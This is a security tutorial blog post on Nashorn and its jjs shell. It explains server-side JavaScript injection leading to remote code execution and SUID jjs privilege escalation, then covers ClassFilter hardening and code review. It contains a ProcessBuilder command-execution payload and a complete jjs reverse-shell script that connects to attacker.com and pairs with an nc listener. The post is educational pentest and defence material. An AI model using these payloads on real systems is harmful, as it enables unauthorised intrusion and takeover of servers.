JAVA + JS → JJS

KG
4 min read · Jul 27, 2020

JAVA…JAVASCRIPT.

Even though they are completely different languages, traditionally one for server-side development and the other for the client side, how great would it be if Java code could execute inside JavaScript and vice versa? The results would be awesome. Let’s get straight into the concept. Have you heard of Nashorn?

Nashorn is a JavaScript engine written in Java. It lets Java code execute JavaScript, and lets scripts call back into Java. It shipped as the JDK’s JavaScript engine from JDK 8 (replacing Rhino), was deprecated in JDK 11 and was removed from the JDK in JDK 15. Compared with Rhino it is commonly quoted as 2 to 10 times faster, because it compiles JavaScript to JVM bytecode in memory instead of interpreting it.

Why Nashorn?

When we say Nashorn lets Java execute JavaScript and vice versa, the first question that comes to mind is “Isn’t executing JavaScript inside Java a security concern?”, and a list of vulnerabilities pops up. So why would an application want this? Two common reasons:

  • Customization: end users can change behaviour by editing a script, without recompiling the whole Java application.
  • Code reusability: validation logic written for the client side can be reused on the server side, because the business rules are the same.

To interact with the Nashorn JavaScript engine, the JDK ships two command-line tools: jjs (Java JavaScript) and jrunscript. Let’s focus on jjs for now.

jjs (Java JavaScript) is the recommended shell for Nashorn. We can write JavaScript that embeds Java calls (through Java.type) and run the file with jjs; similarly, Java code can embed and evaluate JavaScript snippets through javax.script. Development aside, let’s move on to the security aspect.

To-Do Checks

Suppose a web application has a feature that accepts JavaScript code or a JavaScript file from users and evaluates it server-side to perform a few operations. Whenever you see such functionality, jump in and test for this vulnerability.

Provide JavaScript code to the application that reaches into Java and runs a system command, giving remote code execution on the server.

Sample Code (shown as images in the original post; only the captions survive):

  • JavaScript file which, when supplied to the Nashorn script engine, executes a command on the remote system.
  • Java code which evaluates the included JS file, leading to remote code execution.
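The two snippets described above, reconstructed as an added example rather than the post’s own code: a Java service that evaluates a user-supplied JavaScript file with Nashorn, together with a constructed attacker script. It assumes JDK 8u40 through JDK 14, where Nashorn ships with the JDK; the class and file names are made up for the example.

```java
// Added example, not the post's own code: a Java service that evaluates a
// user-supplied JavaScript file with Nashorn, plus a constructed attacker
// script of the kind the post describes. Assumes JDK 8u40 through JDK 14,
// where Nashorn ships with the JDK (getEngineByName("nashorn") returns null
// on JDK 15+ unless the standalone Nashorn artifact is on the classpath).
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public class UnsafeScriptRunner {

    // Constructed attacker payload. Where the application expects a harmless
    // validation rule, the script uses Nashorn's Java.type bridge to reach
    // java.lang.ProcessBuilder, runs a command and makes the command output
    // the script's completion value, so it comes straight back to the caller.
    static final String PAYLOAD = String.join("\n",
        "var ProcessBuilder = Java.type('java.lang.ProcessBuilder');",
        "var p = new ProcessBuilder('id').redirectErrorStream(true).start();",
        "var Scanner = Java.type('java.util.Scanner');",
        "var sc = new Scanner(p.getInputStream()).useDelimiter('\\\\A');",
        "var output = sc.hasNext() ? sc.next() : '';",
        "p.waitFor();",
        "output;");

    /** The vulnerable pattern: the script comes from an untrusted source and is
     *  evaluated by an engine created without a ClassFilter, so it can use any
     *  Java class the JVM can load, with the privileges of the server process. */
    static Object runUserScript(Path scriptFile) throws IOException, ScriptException {
        ScriptEngine engine = new ScriptEngineManager().getEngineByName("nashorn");
        if (engine == null) {
            throw new IllegalStateException("Nashorn engine not available on this JDK");
        }
        String script = new String(Files.readAllBytes(scriptFile), StandardCharsets.UTF_8);
        return engine.eval(script);
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for the upload: the "user's" script is written to a temp file,
        // exactly as an upload handler would before handing it to the engine.
        Path uploaded = Files.createTempFile("user-script", ".js");
        try {
            Files.write(uploaded, PAYLOAD.getBytes(StandardCharsets.UTF_8));
            System.out.println("script result (output of `id` on the server):");
            System.out.println(runUserScript(uploaded));
        } finally {
            Files.delete(uploaded);
        }
    }
}
```

Compile and run it with `javac UnsafeScriptRunner.java && java UnsafeScriptRunner` on a JDK that still bundles Nashorn; on JDK 11 to 14 the engine prints a deprecation warning first. The point to take away is that nothing in `runUserScript` distinguishes a validation rule from a process launcher: whatever the script names through `Java.type` is resolved against the full JDK.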

During a pentest, when you find jjs with the SUID bit set (for example /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs, as reported by LinEnum or a similar enumeration script), here is the quick exploit that gives you a shell through privilege escalation. Follow GTFOBins — JJS Exploit. One caveat: the reverse shell below starts /bin/bash -i, and bash drops a setuid effective UID unless it is started with -p, so for the SUID case use /bin/bash -p or the dedicated SUID entry on GTFOBins.

The PoC script is shown below:

Reverse Shell:

It can send back a reverse shell to a listening attacker to open remote network access.

  • Run nc -nvlp 12345 on the attacker box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
echo 'var host=Java.type("java.lang.System").getenv("RHOST");
var port=Java.type("java.lang.System").getenv("RPORT");
var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
var p=new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
var Socket = Java.type("java.net.Socket");
var s=new Socket(host,port);
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Java.type("java.lang.Thread").sleep(50);
  try {p.exitValue();break;}catch (e){}
};
p.destroy();s.close();' | jjs

Tadah!! We’re on the machine.

Remediations:

For Developers:

We can mitigate this vulnerability by creating the engine with a ClassFilter (jdk.nashorn.api.scripting.ClassFilter, available from JDK 8u40). The interface has a single method, exposeToScripts(String className), which Nashorn consults every time a script names a Java class through Java.type or Packages. Return false for anything the script has no business touching (better, return true only for an explicit allow-list) and the script can no longer reach java.lang.ProcessBuilder, java.lang.Runtime, java.io.File and friends. Be clear about what it does not do: it is not a sandbox. It does not limit CPU or memory, it does not stop the built-in exit() and quit() functions from calling System.exit, and it does not restrict calls on Java objects you hand to the script yourself. Treat user-supplied scripts as untrusted input and run them with least privilege.
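The hardened form of the user-script feature, as an added example and not the post’s code: the engine is created through NashornScriptEngineFactory with an allow-list ClassFilter, a constructed validation rule still runs, and a constructed ProcessBuilder payload is refused. The rule, the allow-list contents and the class names are assumptions; it targets JDK 8u40 through JDK 14.

```java
// Added example, not the post's own code: the same user-script feature with
// the engine created through NashornScriptEngineFactory and an allow-list
// ClassFilter. Assumes JDK 8u40 through JDK 14 (jdk.nashorn.api.scripting);
// the validation rule and the allow-list are assumptions about what such a
// feature needs.
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import javax.script.ScriptEngine;
import javax.script.ScriptException;
import jdk.nashorn.api.scripting.ClassFilter;
import jdk.nashorn.api.scripting.NashornScriptEngineFactory;

public class FilteredScriptRunner {

    /** Allow-list filter. Nashorn calls exposeToScripts for every Java class a
     *  script names through Java.type or Packages; anything not listed is
     *  reported to the script as not found. Allowing only what the feature
     *  needs is safer than denying a list of "known bad" classes, because
     *  there are many ways to spawn a process (ProcessBuilder, Runtime, ...). */
    static final class AllowListFilter implements ClassFilter {
        private final Set<String> allowed;

        AllowListFilter(String... classNames) {
            allowed = new HashSet<>(Arrays.asList(classNames));
        }

        @Override
        public boolean exposeToScripts(String className) {
            return allowed.contains(className);
        }
    }

    static ScriptEngine hardenedEngine() {
        NashornScriptEngineFactory factory = new NashornScriptEngineFactory();
        // Assumption: the validation rules only ever need java.lang.String.
        return factory.getScriptEngine(new AllowListFilter("java.lang.String"));
    }

    // Constructed legitimate script: the validation rule the feature exists for.
    static final String VALIDATION_RULE =
        "function validate(v) { return /^[A-Z]{2}[0-9]{4}$/.test(v); } validate(input);";

    // Constructed attacker script: the same ProcessBuilder trick the post describes.
    static final String PAYLOAD =
        "var ProcessBuilder = Java.type('java.lang.ProcessBuilder');"
      + "new ProcessBuilder('id').start();";

    /** Runs the validation rule against one input; the script sees it as `input`. */
    static boolean validate(ScriptEngine engine, String input) throws ScriptException {
        engine.put("input", input);
        return Boolean.TRUE.equals(engine.eval(VALIDATION_RULE));
    }

    public static void main(String[] args) throws Exception {
        ScriptEngine engine = hardenedEngine();
        System.out.println("AB1234 -> " + validate(engine, "AB1234"));
        System.out.println("drop;  -> " + validate(engine, "drop;"));
        try {
            engine.eval(PAYLOAD);
            System.out.println("FILTER FAILED: script reached ProcessBuilder");
        } catch (Exception e) {
            // Nashorn reports a filtered class as a RuntimeException wrapping
            // ClassNotFoundException, so Java.type('java.lang.ProcessBuilder') ends here.
            System.out.println("blocked: " + e);
        }
    }
}
```

The filter is only part of the answer. If the feature does not need Java interop at all, pass the Nashorn `--no-java` option to `getScriptEngine` so `Java.type` and `Packages` are not exposed in the first place, and run untrusted scripts in a separate low-privilege process with a timeout, since a ClassFilter stops neither an infinite loop nor a call to the built-in `exit()`. On JDK 15 and later the same API lives in the standalone Nashorn artifact under the `org.openjdk.nashorn` package.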

Secure Code

The most reliable way to find this vulnerability is manual code review. Grep the source for keywords such as nashorn, javax.script, ScriptEngineManager and NashornScriptEngineFactory. If the application uses the Nashorn script engine, check whether the engine is created with a ClassFilter and where the scripts it evaluates come from.

If you are doing a pentest, look for functionality that accepts JavaScript as input. Modify the payload shown earlier to perform remote code execution or to get a reverse shell back from the target.

Try out HTB Mango Box for this kind of privilege escalation.

Happy Learning guys!! Please feel free to suggest if any:)

P.S

Code snippets are not my own!!
